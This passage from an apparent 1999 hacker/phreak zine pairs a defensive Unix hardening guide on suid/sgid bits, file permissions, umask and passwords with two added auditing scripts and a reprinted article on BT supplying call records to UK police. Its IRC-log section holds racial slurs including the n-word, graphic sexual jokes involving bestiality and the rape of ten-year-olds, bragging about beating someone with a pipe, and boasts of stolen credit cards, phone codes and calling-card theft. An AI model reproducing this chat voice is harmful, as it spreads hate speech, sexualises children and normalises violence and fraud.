--> tis firewall toolkit [ Includes enhancements and bug fixes from V1.2, and]
                         [ new proxies for HTTP/Gopher and X11.              ]

--> tripwire             [ Monitors system for secur1ty break-in attempts.   ]

--> xp-beta              [ An application gateway of X11 protocol. It is     ]
                         [ designed to be used at a site that has a firewall ]
                         [ and uses SOCKS and/or CERN WWW Proxy.             ]

--> xroute               [ Routes X packets from one machine to another.     ]

All of the above tools will be available from my website:
members.xoom.com/phuk when it is finally finished and online.

Part 3: Knowledge Gathering
--oOo----------------------

There is not really that much to say about knowledge gathering other than to
make sure you find out whether or not the system users and the keepers of
the sacred root password (hopefully just yourself) all follow the security
procedures that you have put into place - and that they gather all the
knowledge necessary to do so.

One of the major points of this is that you don't use the same passwords for
everything. For example, I know someone whose password is a variation of his
name; he uses this password for *everything*: ISP accounts, web email
services, he even used to spell it out numerically for his VMB pass. If you
do this now, then DON'T. It may be safe to use as the root password because
it is hard for someone to find it out, but if they find out your pwd for
something less secure that just happens to be the same pass for root, then
you are fux0red.

File secur1ty is another big issue. The use of umask (file creation masks)
should be mandated. It should also be set to the most restrictive value
possible. It is easy to change a particular file to give someone else access
to it. It is difficult, if not impossible, to know who is looking at your
files. The sensitivity of your data, of course, would certainly determine
the exact level of security placed on the file. In extremely sensitive
cases, such as all your h/p related files, it should also be encrypted (make
sure you use a lengthy pass-word as well, mine is a 34 character sentence
containing random upper/lower case letters and numbers, which I have
memorised). It might also be a good idea to occasionally search for programs
that have suid or sgid capability.

suid and sgid
--oOo--------

Many people talk about suid (set user ID) and sgid (set group ID) without
really knowing that much about them.
The basic concept behind them is that a program (not a script) is set so that it is run as the owner or group set for the program, not the person running the program. For example, say you have a program with suid set, and its owner is root. Anyone running that program runs the program with the permissions of the owner instead of his or her own permissions. The passwd command is a good example of this. The file /etc/passwd is writable by root, and readable by everyone. The passwd program has suid turned on. Therefore, anyone can run the program and change their password. Because the program is running as the user root, not the actual user, the /etc/passwd file can be written to.

The same concept is true of sgid. Instead of the program running with the permissions and authority of the group associated with the person calling the program, the program is run with the permissions and authority of the group that is associated with the program.

How to find suid and sgid files
--oOo--------------------------

Using the find command, you can search the entire system looking for programs with their suid or sgid turned on:

    find / -type f \( -perm -4000 -o -perm -2000 \) -print

A good idea is to run the above command when you first load a system, saving its output to a file readable only by root. Future searches can be performed and compared to this "clean" list of suid and sgid files. This way you can ensure that only the files that should have these permissions actually do.

Setting suid and sgid
--oOo----------------

The set user ID and set group ID can be powerful tools for giving the users the ability to perform tasks without the other problems that could arise with the user having the actual permissions of that group or user. However, these can be dangerous tools too. When considering changing the permissions on a file to be either suid or sgid, keep in mind these two things:

o--> Use the lowest permissions needed to accomplish a task.
o--> Watch for back doors.
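
The "clean list" comparison described under "How to find suid and sgid files", as an added example that is not part of the original article: it records every file carrying the suid (4000) or sgid (2000) bit and reports drift on later runs. The function names and the NEW_OR_CHANGED / MISSING_OR_CHANGED labels are made up for illustration, and a stat(1) that accepts -c is assumed.

```shell
#!/bin/sh
# Added example (not from the original article): record a baseline of
# suid/sgid files and report drift against it on later runs.
# Assumes a stat(1) that supports -c (GNU coreutils or BusyBox).

# list_setid DIR: one line per regular file under DIR with the suid (4000)
# or sgid (2000) bit set, as "MODE OWNER:GROUP PATH", sorted bytewise.
list_setid() {
    # -xdev stays on one filesystem; find's permission errors are discarded.
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        -exec stat -c '%a %U:%G %n' {} + 2>/dev/null | LC_ALL=C sort
}

# save_baseline DIR FILE: write the "clean" list to FILE, readable only by
# the user running the scan (root, in the article's scenario).
save_baseline() {
    ( umask 077 && list_setid "$1" > "$2" ) && chmod 600 "$2"
}

# compare_baseline DIR FILE: print every difference between the current scan
# and FILE. Returns 0 when they match, 1 on drift, 2 on a setup error.
compare_baseline() {
    [ -r "$2" ] || { echo "baseline $2 not readable" >&2; return 2; }
    cb_cur=$(mktemp) || return 2
    list_setid "$1" > "$cb_cur"
    # comm needs both inputs sorted the same way; list_setid guarantees it.
    cb_report=$(
        LC_ALL=C comm -13 "$2" "$cb_cur" | sed 's/^/NEW_OR_CHANGED /'
        LC_ALL=C comm -23 "$2" "$cb_cur" | sed 's/^/MISSING_OR_CHANGED /'
    )
    rm -f "$cb_cur"
    if [ -z "$cb_report" ]; then
        return 0
    fi
    printf '%s\n' "$cb_report"
    return 1
}

# Command-line use: "baseline DIR FILE" once on a fresh install,
# then "check DIR FILE" from cron or by hand.
case "${1:-}" in
    baseline) save_baseline "$2" "$3" ;;
    check)    compare_baseline "$2" "$3" ;;
esac
```

A file whose mode changes (say 4755 to 6755) shows up under both labels, once with the old mode and once with the new.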
Using the lowest permissions means not giving a file an suid of root if at all possible. Often, a less privileged user can be configured to do the task. The same goes for sgid. Many times, setting the group to the appropriate non-sys group will accomplish the same task while limiting other potential problems.

Back doors/Trojans come in many forms. A program that allows a shell is a back door. A program that has multiple entrances and exits is a back door. Keep in mind that if a user can run an suid program set to root and the program contains a back door (the user can get out of the program to a prompt without actually exiting the program), then the system keeps an effective user ID as what the program is set to (ie: root), and the user now has root permissions.

With that said, how do you set a file to have the effective user be the owner of the file, or the effective group be the group of the file, instead of running as the user ID or the user's group ID of the person invoking the file? The permissions are added with the chmod command, as follows:

    chmod u+s file(s)
    chmod g+s file(s)

The first example sets suid for the file(s) listed. The second example sets the sgid of the file(s) listed. Remember, suid sets the effective ID of the process to the owner associated with the file, and sgid sets the effective group ID of the process to the group associated with the file. These cannot be set on non-executables.

File and Directory Permissions
--oOo-------------------------

File and directory permissions are the basics for providing security on a system. These, along with the authentication system, provide the basis for all security. Unfortunately, many people do not know what permissions on directories mean, or they assume they mean the same thing they do on files. The following section describes the permissions on files; after that, the permissions on directories are described.
Files
--o--

The permissions for files are split into three different sections: the owner of the file, the group associated with the file, and everyone else (the w0rld). Each section has its own set of file permissions. These permissions provide the ability to read, write, and execute (or, of course, to deny the same). These permissions are called a file's 'filemode'. Filemodes are set with the chmod command.

There are two ways to specify the permissions of the object. You can use the numeric coding system or the letter coding system. Using the letter coding system, the three sections are referred to as 'u' for user, 'g' for group, and 'o' for other, or 'a' for all three. There are three basic types of permissions: 'r' for read, 'w' for write or 'x' for execute. Combinations of r, w and x with the three groups provide the permissions for files. In the following example, the owner of the file (me) has read, write, and execute permissions, while everyone else has read access only.

    shell:/home/zomba$ ls -l 0d4yz
    -rwxr--r-- 1 zomba users 10 May 21 48:32 0d4yz

The command ls -l tells the computer to give you a long (-l) listing (ls) of the file (0d4yz). The resulting line is shown in the second code line, and it tells you a number of things about the file. First, it tells you the permissions. Next it tells you how many links the file has. It then tells you who owns the file (zomba) and what group is associated with the file (users). Following the ownership section, the date and timestamp for the last time the file was modified is given. Finally, the name of the file is listed (0d4yz).

The permissions are actually made up of four sections. The first section is a single character that identifies the type of object that is listed out. These can be:

    -   Plain File
    b   Block special file
    c   Character special file
    d   Directory
    l   Symbolic link
    p   Named pipe
    s   Socket

Following the file type identifier are the three sets of permissions: rwx (owner), r-- (group), r-- (other).
Directories
----oo-----

The permissions on a directory are the same as those used by files: read, write and execute. The actual permissions, though, mean different things. For a directory, read access provides the ability to list the names of the files in that directory. It does not allow the other attributes to be seen (owner, group, size, and so on). Write access provides the ability to alter the directory contents. This means that the user could create and delete files in the directory. Finally, execute access lets the user make the directory the current directory.

As I stated earlier, the permissions can also be manipulated with a numeric coding system. The basic concept is the same as the letter coding system. As a matter of fact, the permissions look exactly alike. The difference is the way the permissions are identified. The numeric system uses binary counting to determine the value for each permission and sets them. Also, the find command can accept the permissions as an argument using the -perm option. In this case, the permissions must be given in their numeric form.

With binary, you count from the right to the left. Therefore, if you look at a file, you can easily come up with its numeric coding system value. The following file has full permissions for the owner and read permissions for the group and the world:

    shell:/home/zomba$ ls -la 0clue
    -rwxr--r-- 1 zomba users 10 May 22 00:12 0clue

This would be coded as 744; the table below shows how this was formed.

    Permission   Value
    Read         4
    Write        2
    Execute      1

Permissions use an additive (if that's a word) process. Therefore, a person with read, write, and execute permissions to a file would have 7 (4+2+1). Read and execute would have a value of 5. Remember, there are three sets of values, so each section would have its own value.
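
The additive coding above, as an added example that is not part of the original article: a shell function that turns the mode column of `ls -l` into its numeric value, and a filter that flags suid, sgid and world-writable entries in a listing. It goes beyond the 744 case to the s/S and t/T characters used for suid, sgid and sticky; the function names and the sample listing are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original article): decode the mode column of
# `ls -l` into the numeric form and flag the entries worth a second look.

# mode_to_octal STRING: "-rwxr--r--" -> 744, "-rwsr--r--" -> 4744.
# Returns 1 if STRING is not a well-formed mode field.
mode_to_octal() {
    m=$1
    [ "${#m}" -ge 10 ] || return 1
    case $m in [-bcdlps]*) ;; *) return 1 ;; esac   # file type character
    special=0; digits=; start=2
    for weight in 4 2 1; do            # special-bit weight: suid, sgid, sticky
        triad=$(printf '%s' "$m" | cut -c"$start"-"$((start + 2))")
        start=$((start + 3))
        r=${triad%??}; x=${triad#??}; w=${triad#?}; w=${w%?}
        v=0
        case $r in r) v=$((v + 4)) ;; -) ;; *) return 1 ;; esac
        case $w in w) v=$((v + 2)) ;; -) ;; *) return 1 ;; esac
        case $x in
            x) v=$((v + 1)) ;;
            -) ;;
            s) [ "$weight" -ne 1 ] || return 1     # s: special bit plus execute
               v=$((v + 1)); special=$((special + weight)) ;;
            S) [ "$weight" -ne 1 ] || return 1     # S: special bit, no execute
               special=$((special + weight)) ;;
            t) [ "$weight" -eq 1 ] || return 1     # t/T: sticky, "other" only
               v=$((v + 1)); special=$((special + weight)) ;;
            T) [ "$weight" -eq 1 ] || return 1
               special=$((special + weight)) ;;
            *) return 1 ;;
        esac
        digits=$digits$v
    done
    if [ "$special" -ne 0 ]; then digits=$special$digits; fi
    printf '%s\n' "$digits"
}

# audit_listing: read `ls -l` lines on stdin and print "OCTAL NAME FLAGS" for
# every entry that is suid, sgid or world-writable.
audit_listing() {
    while read -r perms _links _owner _group _size _mon _day _time name; do
        oct=$(mode_to_octal "$perms") || continue    # skip "total N" etc.
        sp=0
        case $oct in ????) sp=${oct%???} ;; esac
        other=${oct#"${oct%?}"}                      # last digit: "other" triad
        flags=
        if [ $((sp & 4)) -ne 0 ]; then flags="$flags suid"; fi
        if [ $((sp & 2)) -ne 0 ]; then flags="$flags sgid"; fi
        if [ $((other & 2)) -ne 0 ]; then flags="$flags world-writable"; fi
        if [ -n "$flags" ]; then printf '%s %s%s\n' "$oct" "$name" "$flags"; fi
    done
}

# Constructed sample listing; the first two lines reuse the article's files.
SAMPLE_LISTING='-rwxr--r-- 1 zomba users 10 May 22 00:12 0clue
-rwsr--r-- 1 zomba users 10 May 22 00:22 w0rd
-rwxr-sr-- 1 zomba users 10 May 22 00:22 w0rd.sgid
-rw-rw-rw- 1 zomba users 10 May 22 00:30 notes'

sample_findings() {
    printf '%s\n' "$SAMPLE_LISTING" | audit_listing
}

sample_findings
```

On a live system the same filter can be fed with `ls -l DIR | audit_listing`.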
The following table shows both the numeric system and the character system for the permissions:

    Permission                 Numeric   Character
    Read-only                  4         r--
    Write-only                 2         -w-
    Execute-only               1         --x
    Read and write             6         rw-
    Read and execute           5         r-x
    Read, write and execute    7         rwx

Permissions can be changed using the chmod command. With the numeric system, the chmod command must be given the value of all three fields. Therefore, to change a file to read, write, and execute by everyone, the following command would be issued:

    $ chmod 777 file(s)

To perform the same task with the character system, the following command would be issued:

    $ chmod a+rwx file(s)

Of course, more than one type of permission can be specified at any one time. The following command adds write access for the owner of the file, and adds read and execute access to the group and everyone else:

    $ chmod u+w,og+rx file(s)

The advantage that the character system provides is that you do not have to know what the previous permissions are. You can selectively add or remove permissions without worrying about the rest. With the numeric system, each section of users must always be specified. The downside of the character system is when complex changes are being made. Looking at the preceding example (chmod u+w,og+rx file(s)), it might have been easier to use the numeric system and replace all those letters with three numbers: 755.

How suid and sgid fit into this picture
--oOo----------------------------------

The special purpose access modes suid and sgid add an extra character to the picture. Before looking at what a file looks like with the different special access modes, take a look at the table below for the identifying characters for each of the modes.

    Code   Name   Meaning
    s      suid   Sets process user ID on execution
    s      sgid   Sets process group ID on execution

suid and sgid are used on executables. Therefore, the code is placed where the code for the executable would normally go.
The following file has suid set:

    $ ls -la w0rd
    -rwsr--r-- 1 zomba users 10 May 22 00:22 w0rd

The difference between the suid being set and the sgid being set is the placement of the code. The same file with sgid active would look like this:

    $ ls -la w0rd
    -rwxr-sr-- 1 zomba users 10 May 22 00:22 w0rd

To set the suid with the character system, the following command would be executed:

    $ chmod u+s file(s)

To set the sgid with the character system, the following command would be executed:

    $ chmod g+s file(s)

To set the suid and the sgid using the numeric system, you will have to use these two commands:

    $ chmod 2### file(s)    # sets sgid
    $ chmod 4### file(s)    # sets suid

In both instances, the ### is replaced with the rest of the values for the permissions. The additive process is used to combine permissions; therefore, the following command would add suid and sgid to a file:

    $ chmod 6### file(s)

The default mode for a file or directory
--oOo-----------------------------------

The default mode for a file or directory is set with the umask. The umask uses the numeric system to define its value. To set the umask, you must first determine the value that you want the files to have. For example, a common file permission set is 644. The owner has read and write permissions and the rest of the world has read permission. After the value is determined, it is subtracted from 777. Keeping the same example of 644, the value would then become 133. This value is the umask value. Typically, this value is placed in a system file that is read when a user first logs on. After the value is set, all files created will set their permissions automatically using this value.

Passwords: a second look
--oOo-------------------

The system stores the user's encrypted password in the /etc/passwd file. If the system is using a shadow password system, the value placed in this field will be an x. A value of * blocks login access to the account, as * is not a valid character for an encrypted field.
This field should never be edited (after it is set up) by hand, but a program such as passwd should be used so that proper encryption takes place. If this field is changed by hand, the old password is no longer valid and, more than likely, will have to be changed by root.

NOTE: if the system is using a shadow password system then a separate file exists called /etc/shadow that contains passwords (encrypted).

A password is a secret set of characters set up by the user that is known only by the user. The system asks for the password, compares what is input to the known password, and, if they match, confirms that the user is who they say they are and lets them access the system. I can't stress enough - do not write down your password! It might be hard for a remote hax0r to see it but anyone at your comp will immediately gain your permissions.

Related WWW sites
--oOo------------

www.l0pht.com
www.rhino9.com
www.cert.org
www.geek-girl.com/bugtraq
members.xoom.com/phuk <-- soon all tewls mentioned in this file will be here!
www.rootshell.com
www.epidemik.org <-- not up yet but be sure to look out for it!

Basically, go to any site that offers exploits/security advisories and read them. If any are relevant to your system, make sure you install any patches available.

Greets and shouts
--oOo------------

Werd to the darkcyde collective, extra shouts to hybrid, bodie and force. Also greetz to [JaSuN], darkflame, xio, PUBLiC NUiSANCE, shadow, gossi, elf, downtime, kryptus, and a BIG shout to CFiSH.

(c) b4b0 1999.

-----------oOo------------ EOF ------------oOo-----------

********************************
*** zomba's bonus ph0newarez ***
********************************

895xxx Hand Scan April/May '99 by z0mba (000-310)
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::[ Scan of O8OO 252 XXX ]::::::::[OO--[ by shadow-x ]----------------
-->]OO[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::[ IRC logz ]::::::::[OO--[ by various peeps ]-----------------------
-->]OO[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

fORCE's quotes of the month - READ THIS SHIT, LOL@!@!"$@!"$!
--oOo----------------------

Now force comes out with some funny shit on IRC, and here is the best of it, now please remember that any references to him being gay (or me for that matter) are just *jokes* and should not be taken seriously!, a lot was taken from logs from when we were pranking various chans including #gay #gaysex and #jesus.

[00:41] feckin internet explorer sucks [01:11] kinda, i had a guy telling me he was putting nutella on his dick [01:12] hehe [01:12] turned me on! funniest thing i heard all day [01:13] :) [01:13] 100% true [01:13] sick people on those lines i take it you hung up pretty sharpish [01:14] NO WAY! i ran to the kitchen and go the nutella! [01:14] got the heh [01:14] to see what i was missing out on... so you ended up with a brown knob hmm [01:15] yeah had to shower afterwards :( [01:39] browsing pr0n whilst not paying... life doesn't get any better [01:39] if i was getting head right now it would be perfect you spanking your monkey?
[01:52] * fORCE- moans that'll be a yes then [01:53] no [01:53] i *was* but i was premature [01:53] :( sticky keyboard feck [01:55] pheck [01:06] ok, what music you into [01:06] ? [01:06] [01:06] The Abyssinian Baptist Gospel Choir [01:06] ? oh yeah man, they r0ck [01:07] lol [01:07] fuckin negros [01:09] well i gotta go, you greasy slut [23:28] cfish is leet i wish i was as cool as him ladyboy [23:33] word [23:34] bangkok chickboy pegleg motherfuckin' cocksucking wh0re [23:34] you know liz hurley? yeah man, fucked her last week [23:36] leet [23:36] she comes from where i live [23:41] g33k fux0r you [23:41] fr34k l4m3r [23:42] p3gl3g l4dyb0y [23:42] b4ngk0k ch1ckb0y [23:44] now i'm really off [23:44] the net sucks [23:44] i'm never coming back [23:44] send me some voice mail nigger [23:44] and include c0dez in them yeah right [00:40] oi [00:40] pencil dick y0y0 l4m3w0d [00:41] p3nc1ld1c|< [00:42] what up nothin [00:43] got any <0d3z? [23:29] why 2 of you? the other is a shell [23:30] i see [23:31] said the blind man to his deaf dog [01:04] you are an experiance rider of the chocolate highway [01:04] i have a gimp suit [01:04] they are ereet [01:38] i love the advery [01:39] advert [01:39] ooooooooh eight niiiine ooooone FIFTY! FIFTY! FIFTY! [01:39] i called it once through a pbx i know nutella on dick incident [01:40] haha [01:40] did i tell ya about me hearing that cfish lamer on there? no [01:41] i heard his voice before on vmbs and i knew his name and this guy on 0891505050 says "its ollie i'm busting for it so please message me girls" [01:41] i swear it was him [01:41] i messaged him but he went straight away [22:14] hey [22:14] i love a big veiny cock in my ass [22:14] i like gangbangs...anyone else? 
[22:14] i lost my anal virginity to my dog [22:15] i got gang raped once by a gang of 1O year olds * fORCE is now known as fatb0y [02:27] i stared at all the boys in the changing rooms and the showers [02:27] i got an erection [02:27] and they called me 'boner boy' for the rest of my school life [02:28] i feel so bad [02:28] considered suicide [02:28] didn't work [02:28] so i went to this gay bar [02:28] and met some really *nice* people [02:28] one was called 'ian' [02:28] he took me back to his place and we 'played around' [02:29] then he started getting rough [02:29] and pinned me down [02:29] and penetrated my anus hole [02:29] it felt so good [02:29] but it also hurt [02:29] i bled a fair bit [02:29] do you like to get fucked? [02:29] i still get discharge [02:29] it was nice [02:29] and yes i do [02:30] i wish i had a vagina [02:30] so much [02:30] so do you guys bleed a lot? [02:30] or am i a freak? [21:31] my mum rekons jesus was an alien [21:32] NM: it would be impossible for that to be done and for a huge inverse parralelism to occur [21:32] *** Quits: NM (Leaving) [21:32] i read that jesus was a mafia boss once [21:32] hahhaha [21:34] i read that jesus likes it hardc0re up his rear dorr [21:34] door even TONEKILLA } b1tch1ng ----------------- (tonekill4): why have you been such a bitch to me recently? ([JaSuN]): eh? 
([JaSuN]): i have not ([JaSuN]): if you mean about darkcyde - hybrid told me who to allow ops via bot (tonekill4): have too (tonekill4): removing me from op (tonekill4): and shit ([JaSuN]): look dude, its not upto me (tonekill4): thats being a bitch ([JaSuN]): well...not my choice (tonekill4): specially when everyone was turning on me (tonekill4): haha (tonekill4): hybrid says jump ([JaSuN]): besides, even if you have op on fatality...slut would deop you (tonekill4): everyone follows the master god's command (tonekill4): i fucking ran that hcnanel for 2 months (tonekill4): kept you and your bot opped (tonekill4): and then bewm&(*!^$#*&&$*&# ([JaSuN]): sorry...i don't have any say (tonekill4): well... (tonekill4): still... ([JaSuN]): i just put the fucking thing in there ([JaSuN]): sorry! (tonekill4): i mean i fucking ran that channel with no problem (tonekill4): then all the sudded ([JaSuN]): tell hybrid then (tonekill4): everyone fucking jumps around hybrid like he's god and just fucking turns on me (tonekill4): i cant talk to him (tonekill4): he has me on ignore (tonekill4): so i cant work the shit out (tonekill4): i halfway told him completly how to run a bot (tonekill4): he asked me ? after ? (tonekill4): and i helped him (tonekill4): then all the sudded, he starts ([JaSuN]): owww. (tonekill4): and when i ban him back, he kicks me out (tonekill4): and takes me off op and shit ([JaSuN]): i see. (tonekilla): but, since you are one of hybrid's adoring fans, forget it. ([JaSuN]): look (tonekilla): and downtime is my fucking best friend ([JaSuN]): i don't support anyone or anything... (tonekilla): and he does the same ([JaSuN]): i just was told who to give ops, thats all. ([JaSuN]): I don't stick up for anyone against other ppl I know and I don't like arguments about it! (tonekilla): ok (tonekilla): ok ([JaSuN]): so.. ([JaSuN]): i am still kewl with you, I have no problems. 
(tonekilla): well ok (tonekilla): i guess i remove ban then heh (tonekilla): i thought it was your idea (tonekilla): => ([JaSuN]): about what?! (tonekilla): come in (tonekilla): #telkore (tonekilla): oh (tonekilla): and do you know the command on an old v. eggie to list all the channels its in? ([JaSuN]): .status ([JaSuN]): that will tell you (tonekilla): thanx ([JaSuN]): np (tonekilla): yay (tonekilla): heh (tonekilla): i had forgotton a channel --------------------- SPOT THE WORD _FUCK_ IN #darkcyde } we all need to learn some manners.. tonekilla is a fuckin moron fucker i fucking keep my homewerk on there thats fucking lame... packet kiddies are coming at me for no real reason tonight force is a fuckin p4k13 woops fucking script let me fix this *xio* which fucking sucks, heh. fuckin' shit fuck <[JaSuN]> fucking thing fuck sake my sounddev is fucked right now.. doesn't work . <[JaSuN]> gimme fuckin greetz# i need a fucking linerec in. <[JaSuN]> fuckin text flood y0 <[JaSuN]> fuck the song err fuck god fucking damnit. i'm fucking pissed fucking idiot THE FUCKING MUD * hybrid- wonders what the fuck is going on * hybr1d is away: (fucks sake) [BX-MsgLog On] stupid fuckin bot *oclet* you fucked up too? <[JaSuN]> to much time in front onf fuckin pc's fuck fuckin playing football i want a fucking nurse to no, so fuck off l4m3r fuckin fast car yo werd up k4t fuX0r1ng, h4mpstuH li#1ck1ng, d0g a$$ sn1ffing, g3rb1l r4pp1nG, m0nk3y fucK1nG, m0th3rfuck3rZ? I hate that fucking Fatality what the fuck hybrid? heh What the fuck is up jason. well FUCK YOU FUCK YOU NO FUCK YOU fuck who fucken cares tk i dont give a fuck tk: don't fuck with nino bitch ill tell u to relax if i fucken feel like it FUCK YOU NINO IS MY FUCKING BRO IM NOT FUCKING WITH HIM fuck, ch1ckie has her pms and everyone jumps on my back what the fuck is going on now? another fucking fight? ch1ckie started it.... and no one fucking gives a shit damn.. 
i would fuck mary jane in a heart beet you dont fuckng ban someone with everything that happens motherfuckers stop WHAT THE FUCK IS WRONG WITH YOU PEOPLE?! if you dont agree with me, fuck off ;P dude i am just fucken with ya And I ain't really never gave a fuck how niggaz feel * hybrid_ is wondering what the fuck is going on with these ppl EVERYONE SHUT THE FUCK UP fuck you you didnt get banned for no fucking reason from a channel you properly ran for 3 months then someone comes in, kicks and bans you and fucking turns it into a dynasty *downtime-* what the fuck is going on?! tone shut the fuck up for fucks sake, its only irc FUCK YOU WHAT THE FUCK OClet fuck the big yellow this flaw is so fucking simple. fuck it's all fucked irc = fucked, all day, everyday:) fucking good stuff. fuck got fuck loads of cc cards get speech pro u lazy fuck all these fucking kodes still work fucked off fucking poor NT admins FUCKING HUGE BILL~!~# mother fucker more cf1sh logz } this kid called me weired, i dunno why!@" - hybrid --------------- Session Start: Sun May 16 15:21:22 1999 sup? [15:21] ok well not really [15:21] did you put up the thing on barby.org nope jasun did [15:22] why cos ur lame i guess [15:22] why you reckon that i thought we were talking about why jase put it up not what i thought [15:24] ok fine but personnaly what do you think pretty much the same thing you haven't done anything to prove yourself otherwise [15:25] lame or just nothing lame [15:26] but why i dont get it your ereet man, read faith 5 when its out [15:27] when its out i will but why you reckon im lame? just do [15:28] there must be a reason [15:28] i barely know you aww, poor little diddums dood? why u cry about it? [15:33] yes prove me wrong [15:33] just a bit annoyed [15:33] you cant trust anyone i know [15:34] what you want me to do give you 3 outdials a world calling card ~voice mail boxes etc? 
[15:34] lol lamer outdials and vms's are lame my mum could get them [15:34] i know vms's are lame show me u r eleet [15:35] you call a way of grabbing calling cards from 2 meters away from a payphone and having it displayed on a lcd display lame? yup [15:36] im glad your so eleet why thankyou, so am I come on man, prove me wrong [15:36] so could you do that with the calling cards? prove you can grab calling cards from 2 meters away and have it displayed on an LCD and i won't think u are so lame [15:37] good i will and then prove yourself properly [15:37] you know hearing aids [15:37] set to mode T [15:37] they can pick up phone conversations lame everyone knows that [15:38] i know that is in loads of old skool texts [15:38] but if you make a circuit... tell me something thats *not* lame [15:38] that reckognises when you press 144 [15:38] and then decodes the rest until you press stop [15:38] and displays it on a LCD [15:38] is that lame give me circuit schematics then cos that don't prove nothing i could say "make a circuit that decodes secret MI5 government transmission", but that wouldn't make me eleet would it *prove* remember that word? [15:41] true but im working on it so you haven't actually done it yet? [15:41] no [15:41] but in theory it will work l4m3r [15:42] but now im not going to publicise it lots of things werk in theory [15:42] true and lots in practise as well shame u r so lame really isn't it so basically, all u want is phr33 calls lame lame lame [15:42] ask the person who helped you make uphreak.8m.com if im lame *** <=- °SD v8.5 PrO° -=> (cfish) Is Not On IRC Right Now ! *** <=- °SD v8.5 PrO° -=> (cfish) Is Not On IRC Right Now ! Session Close: Sun May 16 15:43:21 1999 downt1me } this dude is EV1l, evil i tell ya.. ------------- I kicked the kid's ass I got my foot, and placed it on his forehead ;) then i got my fist and beat his face to shit. LOL you're an animal lol it was fun.. indeed.. :> no one fucks with me.. 
;) same here cuz i wil grab a chair and hit them with it or a pencil or anything! LOL! the best thing to do is always if ya dont have a clear shot to the head, go for the knees. ;) take them down.. then kick the shit outta them then get a pipe and break it over their backs LOL

-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::[ BT conspiracy ]::::::::[OO--[ postal phreak ]---------------------
-->]OO[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

ANYONE READING this may already have had details of who they telephone or are phoned by fed into police computer files, it emerged last week after details of automatic links between BT and police computers were described in public for the first time.

Delegates to an international conference on economic crime in Cambridge were told that the number of requests for BT data from the police and other agencies was doubling every year, and could involve thousands of people in the course of just one investigation.

Not just phone calls are now logged into police computers, it was revealed. All vehicles entering or leaving the City of London or British seaports are being watched by robot automatic number plate scanners (ANPS), which feed the data to the Police National Computer (PNC) in Hendon. The PNC replies within five seconds if the vehicles are of interest to police.

Daryl Godivala, head of BT's Network Special Investigations Department, explained to the conference that BT has met ever-increasing police demands for details of customers' calls by installing an automated computer-to-computer interface to feed call information out.

Unlike telephone tapping, warrants are not required before confidential data is sent out by BT. All British telecommunications operators, including mobile phone airtime suppliers, are storing and handing over this information, although only BT runs an automated system.
BT says this has been done to minimise cost in the face of escalating and hitherto uncoordinated police requests. Other UK telecommunications companies and mobile phone operators normally supply data only on paper.

Currently, BT receives and processes about 1,000 requests a week, Godivala indicated. Most requests were for details of subscribers' names and addresses, he said, rather than the numbers they had called.

But the traffic in personal call information is already so large that two British firms have produced special software to automatically process BT telephone call data for intelligence purposes. These systems - called iTel and CaseCall - are currently used by every British police force, as well as by Customs, MI5 and the National Criminal Intelligence Service.

Once received, the data is sifted and transformed into pictorial networks and charts of who talks to whom. To these are added bank records, housing information, vehicle details, and information from inquiries, newspapers, the Net and informants. The resulting charts are often so comprehensive and complex as to back up the most robust of paranoid nightmares.

But is it only the guilty who have cause to be worried about the new intelligence systems? According to intelligence analysts who have designed and used telephone call analysis systems, a single investigation - particularly drugs cases - can eventually result in requests for information about calls made by hundreds or even thousands of telephone customers. Names and addresses of customers called by a suspect are traced and fresh requests sent in to get their calls.

The result is an ever-widening circle of people who have been called by people who have been called (and so on) by the original suspect. One Cambridge detective present claimed that this method had worked well for his force after he had downloaded information on thousands of calls and used it to help break a computer theft ring.
Cambridgeshire police crime analyst Cliff Nicklin said £500,000 of stolen equipment had been recovered.

In theory, all requests for BT information such as the name and address of a particular subscriber, or the numbers they have called over the previous three years, have to be approved by a senior police officer, of the rank of assistant chief constable or above. In practice, the senior officer's approval is delegated to more junior officers operating the link computer, and is forwarded automatically from their computers to BT - whose computer centre authenticates the request, and then downloads the information required.

Foreign police and security specialists expressed surprise at the scale and growth of the British telephone surveillance system. In the US, Canada and most European states, a judicial warrant (at least) is necessary to have access to telephone call records. An official from the Canadian Security Intelligence Service said he was astonished that such privacy-sensitive information was so freely handed over. A French investigating magistrate said that in France the police would not be permitted to have such information without judicial approval.

Inevitably, many of those whose telephone numbers are caught in the ever-enlarging web of a criminal investigation will be innocent of any involvement other than sharing the same dentist, doctor, school or uninvolved acquaintances. They could even have been a victim of the suspect - or just a wrong number.

Unlike the guilty, however, the innocent have no right to know that their personal telephone call information has been downloaded by BT into police, customs or security service computers. The Data Protection Act requires both the police and BT to keep full records of disclosures. But the subject whose privacy has been breached is not entitled to find out that disclosure has taken place, even long after an investigation has been concluded.
The BT-police interface was one of a range of novel police resources explained to delegates concerned with fighting international fraud and economic crimes, especially on the Net. They were also told about the latest developments at Britain's PNC which, according to PNC director John Ladley, are leading to much better support for intelligence-led policing.

Many new systems had been introduced in the mid-1990s, and more were scheduled. Among these were Quest, which can search the 5.5 million names in the Criminal Names index by reference to factors including accent, associates, habits, places and addresses, and even shoe sizes. The recently enlarged names index also includes information about DNA samples and photographs, and is linked to a 4.25 million name fingerprint index. Quest was expected to be fully operational early in 1998.

For vehicles, the PNC is offering Vods - a vehicle owners descriptive search - which can answer questions such as: who owns a blue Volvo and lives in this postcode district? Searches like that have previously been too time-consuming to be used in most cases.

Ladley also expects the use of automatic number plate scanners to rise dramatically as more and more police chiefs decide they want them. Currently, scanners send in up to 80,000 checks a day. The PNC anticipates that this use will soon quadruple. All such inquiries are stored for data protection and auditing purposes. This means that historical records from the ANPS system could also be mined, for example to analyse patterns of foreign travel.

The little-noticed and still progressing revolution in police information technology has resulted in the employment of growing numbers of police intelligence analysts who use powerful computer systems to visualise and analyse the meaning of the massive and growing data inputs from cameras, telephones and bank records as well as traditional police sources. Neither these jobs nor the computers to back them up existed in the 1980s.
